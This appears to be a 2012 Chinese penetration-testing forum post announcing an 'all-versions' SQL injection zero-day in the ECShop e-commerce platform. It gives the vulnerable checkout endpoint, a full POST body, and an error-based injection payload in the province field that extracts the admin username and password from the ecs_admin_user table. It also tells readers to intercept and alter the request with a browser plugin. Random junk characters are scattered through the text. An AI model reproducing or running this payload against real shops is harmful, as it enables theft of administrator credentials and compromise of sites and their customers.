中国网络渗透测试联盟

标题: ECShop全版本SQL注入0day [打印本页]
作者: admin    时间: 2012-12-31 09:19
标题: ECShop全版本SQL注入0day
感谢欠杀的黑盒
6 t$ U+ a* v$ I2 R4 `$ U! @  V
( H8 w5 Q# W( H8 R/ a
4 ?4 i' e0 O2 W/ D& q9 ^8 i把任意商品加入购物车在填写配送地址那一页,有地区选择
$ k: Y+ j6 k3 y# o
& W0 G" I. T/ b$ B! oflow.php?step=consignee&direct_shopping=18 z9 V  F6 g- U4 v. z
比如省选择安徽0 T$ J& e. d0 b& _6 \5 h

: q) n* f" r# q( g! l, d  o其中POST数据如下
8 F- g, [8 t  U / I1 H1 T+ R* o. N" G2 g
country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=36 t' ~& d6 S, G  r& r
改成2 }' h# Z9 d2 R' B: `
* |# |7 s- \5 U, w
province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #
) n: }$ H2 ?7 a( |ps:详细的方法,用火狐tamper data插件……..即可改post内容…..
5 _7 Y4 {! V5 u8 r
& l: k% u5 t% D2 Y' b$ |先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包
# a/ j) e+ L1 j$ X0 A 6 ^% p4 w2 q8 X5 D9 o- U
就会回显错误页面了。。。。
+ p+ X5 d# r" {- y: ^4 k9 D
5 N: {. m$ D5 w9 x) h7 H8 S我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的" o0 V6 `( }; C% D! U$ q$ o- t




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2